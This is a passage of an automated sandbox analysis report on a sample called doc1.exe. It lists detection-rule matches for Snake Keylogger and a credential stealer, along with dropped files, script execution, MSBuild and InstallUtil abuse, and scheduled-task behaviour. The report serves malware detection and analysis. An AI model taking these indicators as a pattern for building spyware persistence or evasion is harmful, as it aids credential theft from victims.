                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_06880D6026_2_06880D60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_0688328826_2_06883288
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_0688DA7026_2_0688DA70
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_0688DEB826_2_0688DEB8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4896 -s 1064
                  Source: doc1.exe Static PE information: invalid certificate
                  Source: doc1.exe, 00000001.00000002.2301644426.0000000003C29000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs doc1.exe
                  Source: doc1.exe, 00000001.00000002.2301644426.0000000003C29000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs doc1.exe
                  Source: doc1.exe, 00000001.00000002.2293545434.0000000002BB8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs doc1.exe
                  Source: doc1.exe, 00000001.00000002.2301644426.0000000003A51000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs doc1.exe
                  Source: doc1.exe, 00000001.00000002.2293545434.0000000002A51000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs doc1.exe
                  Source: doc1.exe, 00000001.00000002.2292811799.0000000000E2E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs doc1.exe
                  Source: doc1.exe, 00000001.00000002.2293545434.0000000002C34000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs doc1.exe
                  Source: doc1.exe, 00000001.00000002.2304587014.00000000058C0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs doc1.exe
                  Source: doc1.exe, 00000001.00000002.2302983125.0000000005230000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameUlsahqrq.dll" vs doc1.exe
                  Source: doc1.exe, 00000001.00000002.2301644426.0000000003ACD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs doc1.exe
                  Source: doc1.exe, 00000001.00000002.2304053557.0000000005770000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs doc1.exe
                  Source: doc1.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: amsi64_3508.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: amsi64_2188.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: amsi64_6756.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: amsi64_2548.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: amsi64_2744.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: amsi64_4568.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: 1.2.doc1.exe.3c2d068.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 1.2.doc1.exe.3c2d068.4.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 1.2.doc1.exe.3c2d068.4.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 1.2.doc1.exe.3c2d068.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 11.2.bosotkm.exe.417bdd0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 11.2.bosotkm.exe.417bdd0.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 11.2.bosotkm.exe.417bdd0.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 11.2.bosotkm.exe.417bdd0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 1.2.doc1.exe.3c2d068.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 1.2.doc1.exe.3c2d068.4.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 1.2.doc1.exe.3c2d068.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 1.2.doc1.exe.3c2d068.4.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 11.2.bosotkm.exe.417bdd0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 11.2.bosotkm.exe.417bdd0.1.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 11.2.bosotkm.exe.417bdd0.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 11.2.bosotkm.exe.417bdd0.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 00000001.00000002.2301644426.0000000003C29000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000001.00000002.2301644426.0000000003C29000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 00000001.00000002.2301644426.0000000003CB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000001.00000002.2301644426.0000000003CB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 00000012.00000002.2615450393.000000000442B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000012.00000002.2615450393.000000000442B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 00000012.00000002.2593909614.0000000003461000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 0000000B.00000002.2538896403.000000000417B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0000000B.00000002.2538896403.000000000417B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 0000001A.00000002.3442953774.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0000000B.00000002.2538896403.00000000041FB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0000000B.00000002.2538896403.00000000041FB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 00000001.00000002.2293545434.0000000002C34000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 00000004.00000002.3443050167.000000000041B000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 0000000B.00000002.2514918808.0000000003278000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: Process Memory Space: doc1.exe PID: 6400, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: doc1.exe PID: 6400, type: MEMORYSTR Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: Process Memory Space: InstallUtil.exe PID: 5392, type: MEMORYSTR Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: Process Memory Space: bosotkm.exe PID: 1864, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: bosotkm.exe PID: 1864, type: MEMORYSTR Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: Process Memory Space: bosotkm.exe PID: 1292, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: bosotkm.exe PID: 1292, type: MEMORYSTR Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: Process Memory Space: InstallUtil.exe PID: 1596, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: doc1.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: bosotkm.exe.1.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: 1.2.doc1.exe.3acd5b0.2.raw.unpack, ITaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                  Source: 1.2.doc1.exe.3acd5b0.2.raw.unpack, TaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                  Source: 1.2.doc1.exe.3acd5b0.2.raw.unpack, Task.cs Task registration methods: 'RegisterChanges', 'CreateTask'
                  Source: 1.2.doc1.exe.3acd5b0.2.raw.unpack, TaskService.cs Task registration methods: 'CreateFromToken'
                  Source: 1.2.doc1.exe.3a7d590.5.raw.unpack, ITaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                  Source: 1.2.doc1.exe.3a7d590.5.raw.unpack, TaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                  Source: 1.2.doc1.exe.3a7d590.5.raw.unpack, TaskFolder.cs Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                  Source: 1.2.doc1.exe.3a7d590.5.raw.unpack, Task.cs Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                  Source: 1.2.doc1.exe.3acd5b0.2.raw.unpack, TaskPrincipal.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 1.2.doc1.exe.3acd5b0.2.raw.unpack, TaskSecurity.cs Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                  Source: 1.2.doc1.exe.3acd5b0.2.raw.unpack, TaskSecurity.cs Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                  Source: 1.2.doc1.exe.3acd5b0.2.raw.unpack, User.cs Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                  Source: 1.2.doc1.exe.3a7d590.5.raw.unpack, TaskPrincipal.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 1.2.doc1.exe.3acd5b0.2.raw.unpack, Task.cs Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                  Source: 1.2.doc1.exe.3a7d590.5.raw.unpack, User.cs Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                  Source: 1.2.doc1.exe.3acd5b0.2.raw.unpack, TaskFolder.cs Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                  Source: 1.2.doc1.exe.3a7d590.5.raw.unpack, TaskSecurity.cs Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                  Source: 1.2.doc1.exe.3a7d590.5.raw.unpack, TaskSecurity.cs Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                  Source: MSBuild.exe, 00000023.00000002.2865138161.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: inaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb=
                  Source: MSBuild.exe, 00000029.00000002.3038923676.00000000013FF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbsers\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:r
                  Source: MSBuild.exe, 0000000C.00000002.2458450033.0000000003C99000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: .configAMSBUILDDIRECTORYDELETERETRYCOUNTCMSBUILDDIRECTORYDELETRETRYTIMEOUT.sln
                  Source: MSBuild.exe, 0000000C.00000002.2458450033.0000000003C99000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: MSBuild MyApp.sln /t:Rebuild /p:Configuration=Release
                  Source: MSBuild.exe, 0000000C.00000002.2456725368.0000000000CF8000.00000004.00000010.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2458450033.0000000003C99000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000016.00000002.2558663468.0000000001498000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000016.00000002.2562731419.000000000154D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000016.00000002.2555966193.0000000000FD8000.00000004.00000010.00020000.00000000.sdmp, MSBuild.exe, 0000001D.00000002.2700081075.00000000006F8000.00000004.00000010.00020000.00000000.sdmp, MSBuild.exe, 0000001D.00000002.2700280840.0000000000808000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000023.00000002.2863825564.0000000000CF8000.00000004.00000010.00020000.00000000.sdmp, MSBuild.exe, 00000029.00000002.3038923676.00000000013FF000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000029.00000002.3036386294.0000000000F58000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb
                  Source: MSBuild.exe, 0000000C.00000002.2457220076.0000000000F43000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb==
                  Source: MSBuild.exe, 0000000C.00000002.2456725368.0000000000CF8000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb0q
                  Source: MSBuild.exe, 0000000C.00000002.2458450033.0000000003C99000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: *.sln
                  Source: MSBuild.exe, 0000000C.00000002.2458450033.0000000003C99000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: MSBuild MyApp.csproj /t:Clean
                  Source: MSBuild.exe, 0000000C.00000002.2458450033.0000000003C99000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: /ignoreprojectextensions:.sln
                  Source: MSBuild.exe, 00000016.00000002.2558663468.00000000014E2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb((^
                  Source: MSBuild.exe, 0000000C.00000002.2458450033.0000000003C99000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: MSBUILD : error MSB1048: Solution files cannot be debugged directly. Run MSBuild first with an environment variable MSBUILDEMITSOLUTION=1 to create a corresponding ".sln.metaproj" file. Then debug that.
                  Source: MSBuild.exe, 0000000C.00000002.2456837867.0000000000ECD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: inaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbll
                  Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winEXE@59/79@2/4
                  Source: C:\Users\user\Desktop\doc1.exe File created: C:\Users\user\AppData\Roaming\bosotkm.exe
                  Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3744:120:WilError_03
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
                  Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6452
                  Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3524:120:WilError_03
                  Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4948:120:WilError_03
                  Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3488:120:WilError_03
                  Source: C:\Windows\System32\wermgr.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2496:120:WilError_03
                  Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2308:120:WilError_03
                  Source: C:\Windows\System32\wermgr.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2888:120:WilError_03
                  Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6128:120:WilError_03
                  Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess400
                  Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4016:120:WilError_03
                  Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5984
                  Source: C:\Windows\System32\wermgr.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3576:120:WilError_03
                  Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2420
                  Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4896
                  Source: C:\Windows\System32\wermgr.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2420:120:WilError_03
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\PSReadLineHistoryFile_2116847995
                  Source: C:\Windows\System32\wermgr.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4632:120:WilError_03
                  Source: C:\Users\user\Desktop\doc1.exe File created: C:\Users\user\AppData\Local\Temp\msb.vbe
                  Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\fNUATsLGslepRpn.vbs"
                  Source: doc1.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: doc1.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                  Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='MSBuild.exe'
                  Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
                  Source: C:\Users\user\Desktop\doc1.exe File read: C:\Users\user\Desktop\desktop.ini
                  Source: C:\Users\user\Desktop\doc1.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: unknown Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
